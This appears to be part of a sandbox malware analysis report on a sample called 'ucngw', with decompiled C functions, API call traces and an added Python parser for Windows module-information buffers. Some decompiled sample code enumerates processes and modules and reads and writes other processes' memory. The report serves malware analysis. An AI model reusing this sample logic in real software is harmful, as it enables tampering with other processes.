      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000), ref: 10005260
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000), ref: 10005273
    • FreeLibrary.KERNEL32(00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000,00000001,100011EB), ref: 10005296
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 73%
    			E100148C0(signed int* __ecx, intOrPtr* __edx) {
    				signed int _t86;
    				intOrPtr* _t104;
    				void* _t115;
    				void* _t131;
    
    				_t86 =  *__ecx;
    				 *(_t131 + 0x14) = 0;
    				 *((intOrPtr*)(_t131 + 0x18)) = 0x1001f2d0;
    				 *(_t131 + 0xc) = 0;
    				 *((intOrPtr*)(_t131 + 0x10)) = __ecx;
    				 *(_t131 + 4) = 0;
    				 *((intOrPtr*)(_t131 + 0x28)) = __ecx;
    				_t104 = __edx;
    				 *((intOrPtr*)(_t131 + 0x3c)) = __edx;
    				_t115 = 1;
    				if(_t86 > 3) {
    					return 0xc0000002;
    				} else {
    					switch( *((intOrPtr*)(_t86 * 4 +  &M10014BBC))) {
    						case 0:
    							_push(__ecx);
    							_t88 = E100145E0(__ecx, _t131 + 0x54);
    							_t132 = _t131 + 4;
    							if(_t88 == 0) {
    								goto L32;
    							} else {
    								_t90 =  *((intOrPtr*)(_t132 + 0x5c));
    								_t123 =  *((intOrPtr*)(_t90 + 0x14)) - 8;
    								if(_t123 != _t90 + 0xc) {
    									_t130 =  *((intOrPtr*)(_t132 + 0xbc));
    									while(_t115 != 0) {
    										 *((intOrPtr*)(_t132 + 0x34)) =  *((intOrPtr*)(_t123 + 0x18));
    										 *((intOrPtr*)(_t132 + 0x3c)) =  *((intOrPtr*)(_t123 + 0x20));
    										_t20 = _t123 + 0x2c; // 0x2b
    										 *((intOrPtr*)(_t132 + 0x44)) = _t20;
    										if(E100144D0(_t132 + 0x34, _t132 + 0x18) == 0) {
    											 *(_t132 + 0x40) = 0;
    										} else {
    											_t110 =  *(_t132 + 0x18);
    											 *((intOrPtr*)(_t132 + 0x44)) =  *((intOrPtr*)(_t110 + 8));
    											LocalFree(_t110);
    										}
    										_push(_t130);
    										_push(_t132 + 0x38);
    										_t115 =  *_t104();
    										_t123 =  *((intOrPtr*)(_t123 + 8)) - 8;
    										if(_t123 !=  *((intOrPtr*)(_t132 + 0x5c)) + 0xc) {
    											continue;
    										}
    										goto L10;
    									}
    								}
    								goto L10;
    							}
    							goto L34;
    						case 1:
    							__eax = __esp + 0x2c;
    							_push(__ecx);
    							__edx = __esp + 0x54;
    							 *(__esp + 0x48) = __eax;
    							__eax = E100145E0(__ecx, __esp + 0x54);
    							__esp = __esp + 4;
    							if(__eax == 0) {
    								goto L32;
    							} else {
    								__eax = __esp + 0x94;
    								 *(__esp + 0x24) = __esp + 0x94;
    								__edx = __esp + 0x1c;
    								__eax =  *(__esp + 0x5c);
    								__ecx = __esp + 0x24;
    								 *(__esp + 0x20) =  *(__esp + 0x5c);
    								if(E10014010(__esp + 0x24, __esp + 0x1c, 0x24) == 0) {
    									goto L32;
    								} else {
    									__ecx =  *(__esp + 0xa8);
    									__esi =  *(__esp + 0x5c);
    									__ecx =  *(__esp + 0xa8) + 0xfffffff8;
    									__esi =  *(__esp + 0x5c) + 0xc;
    									if(__ecx == __esi) {
    										L10:
    										return 0;
    									} else {
    										__ebp =  *(__esp + 0xbc);
    										while(__edi != 0) {
    											__eax = __esp + 0x60;
    											 *(__esp + 0x1c) = __ecx;
    											__edx = __esp + 0x20;
    											 *(__esp + 0x28) = __esp + 0x60;
    											__ecx = __esp + 0x28;
    											__edi = E10014010(__esp + 0x28, __esp + 0x20, 0x34);
    											if(__edi != 0) {
    												__ecx =  *(__esp + 0x8c);
    												__eax =  *(__esp + 0x78);
    												 *(__esp + 0x2c) = __ecx;
    												 *(__esp + 0x34) =  *(__esp + 0x78);
    												__eax =  *(__esp + 0x80);
    												__ecx = __ecx >> 0x10;
    												 *(__esp + 0x40) =  *(__esp + 0x80);
    												__eax =  *(__esp + 0x94);
    												 *(__esp + 0x38) =  *(__esp + 0x94);
    												__eax = LocalAlloc(0x40, __ecx);
    												 *(__esp + 0x30) = __eax;
    												if(__eax != 0) {
    													 *(__esp + 0x24) = __eax;
    													__edx = __esp + 0x1c;
    													__eax =  *(__esp + 0x90);
    													__ecx = __esp + 0x24;
    													 *(__esp + 0x1c) =  *(__esp + 0x90);
    													__eax =  *(__esp + 0x2e) & 0x0000ffff;
    													if(E10014010(__esp + 0x24, __esp + 0x1c,  *(__esp + 0x2e) & 0x0000ffff) != 0) {
    														__ecx = __esp + 0x34;
    														__eax = E100146E0(__esp + 0x34);
    														_push(__ebp);
    														__eax = __esp + 0x38;
    														_push(__esp + 0x38);
    														__edi =  *__ebx();
    													}
    													__eax = LocalFree( *(__esp + 0x30));
    												}
    											}
    											__ecx =  *(__esp + 0x68);
    											__ecx =  *(__esp + 0x68) + 0xfffffff8;
    											if(__ecx != __esi) {
    												continue;
    											} else {
    												__eax = 0;
    												_pop(__edi);
    												_pop(__esi);
    												_pop(__ebp);
    												_pop(__ebx);
    												return 0;
    											}
    											goto L34;
    										}
    										goto L10;
    									}
    								}
    							}
    							goto L34;
    						case 2:
    							L32:
    							goto L33;
    						case 3:
    							_push(__ecx);
    							__edx = __esp + 0x18;
    							__ecx = 0xb;
    							__eax = E100147C0(0xb, __esp + 0x18);
    							__esp = __esp + 4;
    							 *(__esp + 0x18) = __eax;
    							if(__eax < 0) {
    								L33:
    								return 0xc0000135;
    							} else {
    								__ebp =  *(__esp + 0x14);
    								__ecx = __esp + 0x2c;
    								__ebx = 0;
    								 *(__esp + 0x44) = __esp + 0x2c;
    								if( *__ebp <= 0) {
    									goto L33;
    								} else {
    									__ecx = 0xfffffff0;
    									__esi = __ebp + 0x10;
    									__ecx = 0xfffffff0 - __ebp;
    									 *(__esp + 0x4c) = 0xfffffff0;
    									while(__edi != 0) {
    										_t72 = __esi - 4; // 0x1001df80
    										__eax =  *_t72;
    										 *(__esp + 0x34) =  *_t72;
    										__eax =  *__esi;
    										 *(__esp + 0x3c) =  *__esi;
    										_t75 =  &(__esi[3]); // 0xdf801001
    										__eax =  *_t75 & 0x0000ffff;
    										__eax = ( *_t75 & 0x0000ffff) + __ecx;
    										__ecx = __ebp + 0x20;
    										__ecx = __eax + __ebp + 0x20;
    										__eax = E10014D30(__eax + __ebp + 0x20);
    										 *(__esp + 0x14) = __eax;
    										if(__eax != 0) {
    											__eax = __esp + 0x30;
    											RtlInitUnicodeString(__esp + 0x30, __esp + 0x30);
    											_push( *(__esp + 0xbc));
    											__eax = __esp + 0x38;
    											 *(__esp + 0x44) = 0;
    											_push(__esp + 0x38);
    											__edi =  *((intOrPtr*)(__esp + 0x50))();
    											__eax = LocalFree( *(__esp + 0x14));
    										}
    										__ecx =  *(__esp + 0x4c);
    										__ebx = __ebx + 1;
    										__esi =  &(__esi[0x47]);
    										if(__ebx <  *__ebp) {
    											continue;
    										}
    										break;
    									}
    									__eax =  *(__esp + 0x18);
    									_pop(__edi);
    									_pop(__esi);
    									_pop(__ebp);
    									_pop(__ebx);
    									return __eax;
    								}
    							}
    							goto L34;
    					}
    				}
    				L34:
    			}

    (statement address column for the function above, detached from its code lines by extraction; covers 0x100148c6 to 0x10014bbb)

    APIs
      • Part of subcall function 100145E0: GetCurrentProcess.KERNEL32(00000001,00001DB1), ref: 100145F5
      • Part of subcall function 100145E0: NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?), ref: 10014630
      • Part of subcall function 100145E0: RtlGetCurrentPeb.NTDLL ref: 1001466D
    • RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100144D0: LocalAlloc.KERNEL32(00000040,00000018,10012590), ref: 10014539
      • Part of subcall function 100144D0: LocalAlloc.KERNEL32(00000040,00000108), ref: 1001457A
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145A9
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145BC
      • Part of subcall function 100144D0: LocalFree.KERNEL32(?), ref: 100145C6
    • LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
    • LocalFree.KERNEL32(?), ref: 10014B77
      • Part of subcall function 100146E0: LocalFree.KERNEL32(?,?,?,10014AAF), ref: 100146FE
    • LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100147C0: NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,00000000), ref: 100147D8
      • Part of subcall function 100147C0: LocalAlloc.KERNEL32(00000040,00001000,-00000FFF,?,00000001,C0000225,1001477C,?,00000000,C0000225,?,1001268A,?,00000001), ref: 100147F3
      • Part of subcall function 100147C0: NtQuerySystemInformation.NTDLL(00000005,00000000,00001000,00000000), ref: 10014804
      • Part of subcall function 100147C0: LocalFree.KERNEL32(00000001,?,00000000,C0000225,?,1001268A,?,00000001), ref: 10014812
      • Part of subcall function 10014D30: LocalAlloc.KERNEL32(00000040,DF801001,1001A7A0,?,10014B45), ref: 10014D5A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
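The loop in the fragment above hands each record's name to a callback and advances by 0x11c bytes, which is the size of an x86 RTL_PROCESS_MODULE_INFORMATION record. The parser below is an added example, not code from the sample or from Joe Sandbox: it reads a buffer in the documented x86 RTL_PROCESS_MODULES layout and extracts the three fields the loop touches (image base, image size, and FullPathName + OffsetToFileName). That the sample's records are this structure is an inference from the stride and offsets; the two records in `sample_buffer()` are constructed test data, not modules from the sandbox run.

```python
import struct
from dataclasses import dataclass
from typing import List

# Documented x86 layout of RTL_PROCESS_MODULE_INFORMATION, 0x11c bytes per record:
#   +0x00 Section, +0x04 MappedBase, +0x08 ImageBase, +0x0c ImageSize, +0x10 Flags,
#   +0x14 LoadOrderIndex, +0x16 InitOrderIndex, +0x18 LoadCount,
#   +0x1a OffsetToFileName, +0x1c FullPathName[256]
ENTRY_FMT = "<IIIIIHHHH256s"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)   # 0x11c, the stride the decompiled loop advances by


@dataclass
class ModuleInfo:
    image_base: int
    image_size: int
    full_path: str
    file_name: str   # FullPathName + OffsetToFileName, the string the loop hands to its callback


def parse_rtl_process_modules(buf: bytes) -> List[ModuleInfo]:
    """Parse a SystemModuleInformation buffer: ULONG NumberOfModules, then the records."""
    if len(buf) < 4:
        raise ValueError("buffer too short for NumberOfModules")
    count = struct.unpack_from("<I", buf, 0)[0]
    needed = 4 + count * ENTRY_SIZE
    if len(buf) < needed:
        raise ValueError(f"{len(buf)} bytes present, {needed} needed for {count} records")
    modules = []
    for i in range(count):
        fields = struct.unpack_from(ENTRY_FMT, buf, 4 + i * ENTRY_SIZE)
        base, size, name_off, raw_path = fields[2], fields[3], fields[8], fields[9]
        path = raw_path.split(b"\0", 1)[0]
        if name_off > len(path):   # the offset comes from a foreign buffer: bounds-check it
            raise ValueError(f"record {i}: OffsetToFileName {name_off} beyond a {len(path)}-byte path")
        modules.append(ModuleInfo(base, size,
                                  path.decode("ascii", "replace"),
                                  path[name_off:].decode("ascii", "replace")))
    return modules


def build_record(base: int, size: int, path: bytes) -> bytes:
    """Constructed record whose OffsetToFileName points at the basename, as the kernel fills it."""
    if len(path) >= 256:
        raise ValueError("FullPathName holds at most 255 characters plus NUL")
    name_off = path.rfind(b"\\") + 1
    return struct.pack(ENTRY_FMT, 0, base, base, size, 0, 0, 0, 1, name_off, path)


def sample_buffer() -> bytes:
    """Two constructed records (not taken from the sandbox run)."""
    records = [
        build_record(0x82000000, 0x00400000, b"\\SystemRoot\\system32\\ntoskrnl.exe"),
        build_record(0x90000000, 0x00001000, b"\\??\\C:\\Windows\\example.sys"),
    ]
    return struct.pack("<I", len(records)) + b"".join(records)


if __name__ == "__main__":
    for m in parse_rtl_process_modules(sample_buffer()):
        print(f"{m.image_base:#010x} {m.image_size:#010x} {m.file_name:<16} {m.full_path}")
```

On a live system the same buffer comes from NtQuerySystemInformation(SystemModuleInformation); the parser rejects truncated buffers and out-of-range name offsets rather than trusting the counts it is given.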
    C-Code - Quality: 96%
    			/* Shape matches the CRT's wcstombs helper (locale code page at +8, mb_cur_max at +4,
    			   errno 0x2a = EILSEQ, 0x16 = EINVAL, GetLastError 0x7a = ERROR_INSUFFICIENT_BUFFER):
    			   runtime library code, not sample logic. Identification inferred from the API sequence
    			   and constants; the report does not state it. */
    			E00C54A22(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				int _v20;
    				int _v24;
    				char* _v28;
    				int _v32;
    				char _v36;
    				intOrPtr _v44;
    				char _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				char* _t61;
    				intOrPtr _t63;
    				int _t64;
    				intOrPtr* _t65;
    				signed int _t68;
    				intOrPtr* _t71;
    				short* _t73;
    				int _t74;
    				int _t76;
    				char _t78;
    				short* _t83;
    				short _t85;
    				int _t90;
    				char* _t96;
    				int _t101;
    				char* _t103;
    				void* _t104;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				int _t108;
    				short* _t110;
    				int _t111;
    				signed int _t112;
    
    				_t104 = __edx;
    				_t59 =  *0xc6a004; // 0x26d30358
    				_v8 = _t59 ^ _t112;
    				_t61 = _a4;
    				_t90 = _a12;
    				_t111 = 0;
    				_v28 = _t61;
    				_v20 = 0;
    				_t110 = _a8;
    				_v24 = _t110;
    				if(_t61 == 0 || _t90 != 0) {
    					if(_t110 != 0) {
    						E00C5499F(_t90,  &_v48, _t104, _a16);
    						_t96 = _v28;
    						if(_t96 == 0) {
    							_t63 = _v44;
    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t110, 0xffffffff, _t111, _t111, _t111,  &_v20);
    								if(_t64 == 0 || _v20 != _t111) {
    									L55:
    									_t65 = E00C56312();
    									_t110 = _t110 | 0xffffffff;
    									 *_t65 = 0x2a;
    									goto L56;
    								} else {
    									_t53 = _t64 - 1; // -1
    									_t110 = _t53;
    									L56:
    									if(_v36 != 0) {
    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
    									}
    									goto L59;
    								}
    							}
    							_t68 =  *_t110 & 0x0000ffff;
    							if(_t68 == 0) {
    								L51:
    								_t110 = _t111;
    								goto L56;
    							}
    							while(_t68 <= 0xff) {
    								_t110 =  &(_t110[1]);
    								_t111 = _t111 + 1;
    								_t68 =  *_t110 & 0x0000ffff;
    								if(_t68 != 0) {
    									continue;
    								}
    								goto L51;
    							}
    							goto L55;
    						}
    						_t106 = _v44;
    						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
    							if( *((intOrPtr*)(_t106 + 4)) != 1) {
    								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, 0xffffffff, _t96, _t90, _t111,  &_v20);
    								if(_t110 == 0) {
    									if(_v20 != _t111 || GetLastError() != 0x7a) {
    										L45:
    										_t71 = E00C56312();
    										_t111 = _t111 | 0xffffffff;
    										 *_t71 = 0x2a;
    										goto L51;
    									} else {
    										if(_t90 == 0) {
    											goto L56;
    										}
    										_t73 = _v24;
    										while(1) {
    											_t107 = _v44;
    											_t101 =  *(_t107 + 4);
    											if(_t101 > 5) {
    												_t101 = 5;
    											}
    											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t101, _t111,  &_v20);
    											_t90 = _a12;
    											_t108 = _t74;
    											if(_t108 == 0 || _v20 != _t111 || _t108 < 0 || _t108 > 5) {
    												goto L55;
    											}
    											if(_t110 + _t108 > _t90) {
    												goto L56;
    											}
    											_t76 = _t111;
    											_v32 = _t76;
    											if(_t108 <= 0) {
    												L43:
    												_t73 = _v24 + 2;
    												_v24 = _t73;
    												if(_t110 < _t90) {
    													continue;
    												}
    												goto L56;
    											}
    											_t103 = _v28;
    											while(1) {
    												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
    												 *((char*)(_t103 + _t110)) = _t78;
    												if(_t78 == 0) {
    													goto L56;
    												}
    												_t76 = _v32 + 1;
    												_t110 =  &(_t110[0]);
    												_v32 = _t76;
    												if(_t76 < _t108) {
    													continue;
    												}
    												goto L43;
    											}
    											goto L56;
    										}
    										goto L55;
    									}
    								}
    								if(_v20 != _t111) {
    									goto L45;
    								}
    								_t28 = _t110 - 1; // -1
    								_t111 = _t28;
    								goto L51;
    							}
    							if(_t90 == 0) {
    								L21:
    								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, _t90, _t96, _t90, _t111,  &_v20);
    								if(_t111 == 0 || _v20 != 0) {
    									goto L45;
    								} else {
    									if(_v28[_t111 - 1] == 0) {
    										_t111 = _t111 - 1;
    									}
    									goto L51;
    								}
    							}
    							_t83 = _t110;
    							_v24 = _t90;
    							while( *_t83 != _t111) {
    								_t83 =  &(_t83[1]);
    								_t16 =  &_v24;
    								 *_t16 = _v24 - 1;
    								if( *_t16 != 0) {
    									continue;
    								}
    								break;
    							}
    							if(_v24 != _t111 &&  *_t83 == _t111) {
    								_t90 = (_t83 - _t110 >> 1) + 1;
    							}
    							goto L21;
    						}
    						if(_t90 == 0) {
    							goto L51;
    						}
    						while( *_t110 <= 0xff) {
    							_t96[_t111] =  *_t110;
    							_t85 =  *_t110;
    							_t110 =  &(_t110[1]);
    							if(_t85 == 0) {
    								goto L51;
    							}
    							_t111 = _t111 + 1;
    							if(_t111 < _t90) {
    								continue;
    							}
    							goto L51;
    						}
    						goto L45;
    					}
    					 *((intOrPtr*)(E00C56312())) = 0x16;
    					E00C54E87();
    					goto L59;
    				} else {
    					L59:
    					return E00C51252(_t90, _v8 ^ _t112, _t110, _t111);
    				}
    			}

    (statement address column for E00C54A22, detached from its code lines by extraction; covers 0x00c54a22 to 0x00c54ca2)

    APIs
    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,?,?), ref: 00C54B06
    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,?,?), ref: 00C54B42
    • GetLastError.KERNEL32 ref: 00C54B68
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,?), ref: 00C54BA1
    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?), ref: 00C54C5E
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 81%
    			/* Shape matches the CRT's GetStringTypeA wrapper: MultiByteToWideChar into a _malloca buffer
    			   (0xcccc / 0xdddd are the _malloca stack / heap markers, 0x400 the _ALLOCA_S_THRESHOLD),
    			   then GetStringTypeW. Runtime library code, not sample logic; identification inferred. */
    			E1000D0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v24;
    				char _v28;
    				void* _v40;
    				signed int _t34;
    				signed int _t40;
    				int _t46;
    				int _t53;
    				void* _t55;
    				int _t57;
    				signed int _t63;
    				int _t67;
    				short* _t69;
    				signed int _t70;
    				short* _t71;
    
    				_t34 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t34 ^ _t70;
    				E10002F77(__ebx,  &_v28, __edx, _a4);
    				_t57 = _a24;
    				if(_t57 == 0) {
    					_t6 = _v24 + 8; // 0x1be85006
    					_t53 =  *_t6;
    					_t57 = _t53;
    					_a24 = _t53;
    				}
    				_t67 = 0;
    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
    				_v12 = _t40;
    				if(_t40 == 0) {
    					L15:
    					if(_v16 != 0) {
    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
    					}
    					return E10001B26(_v8 ^ _t70);
    				}
    				_t55 = _t40 + _t40;
    				asm("sbb eax, eax");
    				if((_t55 + 0x00000008 & _t40) == 0) {
    					_t69 = 0;
    					L11:
    					if(_t69 != 0) {
    						E10001E90(_t67, _t69, _t67, _t55);
    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
    						if(_t46 != 0) {
    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
    						}
    					}
    					L14:
    					E1000B187(_t69);
    					goto L15;
    				}
    				asm("sbb eax, eax");
    				_t48 = _t40 & _t55 + 0x00000008;
    				_t63 = _t55 + 8;
    				if((_t40 & _t55 + 0x00000008) > 0x400) {
    					asm("sbb eax, eax");
    					_t69 = E10005DA1(_t63, _t48 & _t63);
    					if(_t69 == 0) {
    						goto L14;
    					}
    					 *_t69 = 0xdddd;
    					L9:
    					_t69 =  &(_t69[4]);
    					goto L11;
    				}
    				asm("sbb eax, eax");
    				E10010250();
    				_t69 = _t71;
    				if(_t69 == 0) {
    					goto L14;
    				}
    				 *_t69 = 0xcccc;
    				goto L9;
    			}

    (statement address column for E1000D0F4, detached from its code lines by extraction; covers 0x1000d0fc to 0x1000d210)

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,1BE85006,100031C9,00000000,00000000,1000405A,00000000,1000405A,?,00000001,100031C9,1BE85006,00000001,1000405A,1000405A), ref: 1000D141
    • __alloca_probe_16.NTDLLP ref: 1000D179
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000D1CA
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000D1DC
    • __freea.LIBCMT ref: 1000D1E5
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 66%
    			/* Shape matches vcruntime's C++ exception FindHandler: 0x80000003 is EXCEPTION_BREAKPOINT,
    			   0xe0434f4d and 0xe0434352 are the CLR managed-exception codes it special-cases, and
    			   _GetRangeOfTrysToCheck appears in the API list. The decompiler ran past the no-return
    			   E00C560DB calls (the asm("int3") padding) and fused the two functions that follow into
    			   this body, which is why the quality is 66%. Runtime library code; identification inferred. */
    			E00C52C6F(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				intOrPtr _v0;
    				char _v8;
    				char _v12;
    				intOrPtr* _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr* _v60;
    				void* __ebx;
    				void* __ecx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t70;
    				void* _t71;
    				intOrPtr* _t74;
    				intOrPtr* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				signed int _t93;
    				void* _t97;
    				intOrPtr _t98;
    				void* _t100;
    				char _t101;
    				void* _t105;
    				intOrPtr _t111;
    				char _t114;
    				intOrPtr _t116;
    				intOrPtr* _t119;
    				intOrPtr* _t121;
    				intOrPtr* _t123;
    				intOrPtr _t129;
    				void* _t130;
    				intOrPtr* _t131;
    				void* _t132;
    				signed int* _t136;
    				void* _t138;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    
    				_t113 = __edx;
    				_push(_t105);
    				_push(_t105);
    				_t119 = _a4;
    				_t143 =  *_t119 - 0x80000003;
    				if( *_t119 == 0x80000003) {
    					L18:
    					return _t70;
    				} else {
    					_t71 = E00C537A2(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
    					_t98 = _a20;
    					_t144 =  *((intOrPtr*)(_t71 + 8));
    					if( *((intOrPtr*)(_t71 + 8)) == 0) {
    						L6:
    						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
    							E00C560DB(_t98, _t105, _t113, _t119, _t130, __eflags);
    							asm("int3");
    							_t138 = _t140;
    							_t141 = _t140 - 0x18;
    							_push(_t98);
    							_push(_t130);
    							_t131 = _v16;
    							_push(_t119);
    							__eflags = _t131;
    							if(__eflags == 0) {
    								E00C560DB(_t98, _t105, _t113, _t119, _t131, __eflags);
    								asm("int3");
    								_push(_t138);
    								_push(_t98);
    								_push(_t131);
    								_push(_t119);
    								_t121 = _v60;
    								_t132 = 0;
    								__eflags =  *_t121;
    								if( *_t121 <= 0) {
    									L37:
    									_t74 = 0;
    									__eflags = 0;
    								} else {
    									_t100 = 0;
    									while(1) {
    										_t78 = E00C535CE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0xc6a98c);
    										__eflags = _t78;
    										if(_t78 == 0) {
    											break;
    										}
    										_t132 = _t132 + 1;
    										_t100 = _t100 + 0x10;
    										__eflags = _t132 -  *_t121;
    										if(_t132 <  *_t121) {
    											continue;
    										} else {
    											goto L37;
    										}
    										goto L38;
    									}
    									_t74 = 1;
    								}
    								L38:
    								return _t74;
    							} else {
    								_t123 =  *_t131;
    								_t101 = 0;
    								__eflags = _t123;
    								if(_t123 > 0) {
    									_t114 = 0;
    									_v12 = 0;
    									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
    									_t83 = _t82 + 4;
    									__eflags = _t83;
    									_v24 =  *_t82;
    									_v32 = _t83;
    									do {
    										_t109 = _t83;
    										_t84 = _v24;
    										_v20 = _t83;
    										_v16 = _t84;
    										__eflags = _t84;
    										if(_t84 > 0) {
    											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
    											__eflags = _t86;
    											_v28 = _t86;
    											while(1) {
    												_t87 = E00C53257(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
    												_t141 = _t141 + 0xc;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													break;
    												}
    												_t89 = _v16 - 1;
